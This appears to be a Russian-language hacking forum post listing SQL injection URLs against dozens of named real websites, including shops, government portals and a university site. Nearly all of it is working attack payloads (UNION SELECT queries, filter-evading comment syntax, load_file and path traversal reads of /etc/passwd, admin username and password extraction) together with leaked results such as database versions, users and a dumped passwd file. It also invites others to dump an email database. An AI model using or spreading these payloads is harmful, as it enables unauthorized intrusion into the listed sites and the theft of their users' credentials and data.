SQL Инъекции

http://www.shop77.ru/client/image.php?src=http://www.shop77.ru/pics1/39598_0.jpg&id=-517344+union+select+1,version(),3,4+from+mysql.user+--+

http://www.autokedy.ru/podbor.php?af=9385&m=9397+union+select+1,2,table_name,null,null,null,null,null+from+information_schema.tables+--+

 

http://www.jf-lavra.pt/links.php?id=1/**/anD/**/1=-1/**/uniON/**/seLEcT/**/unhex(hex(1)),unhex(hex(1)),unhex(hex(version())),unhex(hex(1)),unhex(hex(1)),unhex(hex(1)),unhex(hex(1)),unhex(hex(1))/*
version = 4.1.23-pro-gpl-log


http://www.beursstart.nl/links.php?id=1+anD+1=7%20+uniON+seLEcT+1,version(),3/*
version = 5.0.45-log

 

[PR=4]

Фан сайт К. Роналдо

Code:

http://www.cronaldo7.es/news_detail.php?id=-10+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5--

ronaldoes:4.1.20:ronaldoes@localhost

 

http://tb.ningbo.gov.cn/homepage/view.php?id=45678&catid=2+union+select+1,2,concat(0x3,version(),user(),database())+limit+1,1

4.1.21-standardnbtb@localhostnbtb


http://www.armagh.gov.uk/other_details1.php?externalbodies_id=7+union+select+1,2,concat_ws(0x2a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+limit+1,1/*

4.0.18armaghcorp@localhostarmaghcorp 5

 

Code:

http://www.rating.am/drraw.php?rateBy=-days&id=-2057+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version())--

там база мыл кому надо сливайте
[email protected] : rating : 5.0.51a-log

 

5.0.45:derzay:derzay@localhost

 

Aleksej///12345678

portbld-freebsd7.1

 

tvsur.co.cr --- PR=3
http://tvsur.co.cr/esp/links.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/version()/**/FROM/**/links
Version = 4.1.22-standard-log
User = tvsurco_tvsurco@localhost
Database = tvsurco_tvsur

http://tvsur.co.cr/esp/links.php?id=1/**/anD/**/1=7%20/**/uniON/**/seLEcT/**/email/**/FROM/**/links


506radio.com ---PR=3
http://506radio.com/esp/links.php?id=1/**/aNd/**/substring(version(),1,1)=4
ветка - 4

 

Code:

http://hundon.net/php/display_model.php?id=-78+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,0,11,12,13+from+mysql.user/*

Database Version: 5.0.32-Debian_7etch10-log
Database name: peterrake
User name: www@localhost

 

http://www.gamingtrend.com/PressReleases/index.php?PRID=-9224+union+select+1,concat_ws(0x3a3a,username,password,status,email,userID),3,4,5,6,7+from+Users+where+status=0x61646D696E+limit+5,1+--+

http://www.spec.bc.ca/news/news.php?newsID=-213+union+select+1,2,3,4,5,6,table_name+from+information_schema.tables+--+

http://www.svcd.ru/docs/news/news.php?newsID=-394'+union+select+1,2+--+&PHPSESSID=97d4ed6ff029c9332fbba5c20ee6ff10

 

aveseica.com --- PR=1
http://www.aveseica.com/links.php?id=1+anD+1=9+union+select+1,version()
version = 5.0.27
user = avesseica@localhost
database - avesseica
table - login (id, login, pass, acesso)

http://www.aveseica.com/links.php?id=1+anD+1=9+union+select+1,conCAt(0x3a,id,0x3a,login,0x3a,pass,0x3a,acesso)+from+login/*

 

Code:

http://www.waterfallswest.com/waterfall.php?id=-413+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,44/*

Database Version: 4.1.20-log
Database name: wwest
User name: [email protected]

 

MacTech25-2006 MacTech25-2007 MacTech25_2008 access accesslog actions actions_aid authmap batch blocks blocks_roles boxes cache cache_block cache_content cache_filter cache_form cache_menu cache_page cache_update cache_views comments contact content_field_issue content_group content_group_fields content_node_field content_node_field_instan

## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # This file will not be consulted for authentication unless the BSD local node # is enabled via /Applications/Utilities/Directory Utility.app # # See the DirectoryService(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _lp:*:26:26rinting Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27ostfix Mail Server:/var/spool/postfix:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _pcastagent:*:55:55odcast Producer Agent:/var/pcast/agent:/usr/bin/false _pcastserver:*:56:56odcast Producer Server:/var/pcast/server:/usr/bin/false _serialnumberd:*:58:58:Serial Number Daemon:/var/empty:/usr/bin/false _devdocs:*:59:59eveloper Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false _xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

 

Code:

http://www.missoulacvb.org/detail.php?id=-96+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,20/*

Database Version: 5.0.32-Debian_7etch10
Database name: missoulacvb_directory
User name: [email protected]

--------------------------------------------------------------------------------------------------

Code:

http://www.thevalleypost.com/article.php?id=-536+union+select+1,2,unhex(hex(concat_ws(0x3a,username,password))),4,5,6,7,8,9,0,11,12+from+users/*

Database Version: 4.1.14
Database name: thevalleypost
User name: thevalleypost@localhost

 

commercial-russia.ru - ТИЦ=10 + .ru
http://www.commercial-russia.ru/links.php?id=1/**/aNd/**/substring(version(),1,1)=5
ветка = 5

 

http://www.crjs.ru/en/news/news.php?newsid=-141+union+select+1,2,3,4,5,6,7,8,9,id+from+admin_total+--+

http://www.autoconmotorsports.com/news/News.php?NewsID=-55+union+select+1,2,3,4,5,6,7,8,9+/*+

http://anthenv.web.arizona.edu/Officers.php?Role=Treasurer&Bio=../../../../etc/passwd

http://www.nuclearblastusa.com/nb/v2/news/news.php?newsID=-625+union+select+1,2,3,4,5,6,7,8+/*+

http://www.jeffbucknum.com/news/News.php?NewsID=-20+union+select+1,2,3,4,5,6,7,8,9+/*+

http://www.farmaks.ru/rus/news/news.php?NewsID=-53+union+select+1,2,3,4+/*+

 

Code:

http://niet.com/message_info.php?id=273362+union+select+1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8+from+mysql.user/*

Database Version: 5.0.45-log
Database name: nietmail
User name: john@lighttpd

--------------------------------------------------------------------------------------------

PR 6

Code:

http://www.shambhala.org/teachings/view.php?id=-131'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,21/*

Database Version: 5.0.45
Database name: shambhalaweb
User name: shambhalaweb@localhost

 

[PR=4]

Code:

http://www.play-pb.com/sh_new.php?id=-244+union+select+1,2,concat_ws(0x3b,database(),version(),user()),4--

playpb_marikoplaypb;4.1.22-standard;playpb@localhost

 

http://yugday.ru/stat/links.php?ID=1+anD+substring(version(),1,1)=4
версия 4
ТИЦ: 20

 

PGSQL

kalaostgreSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)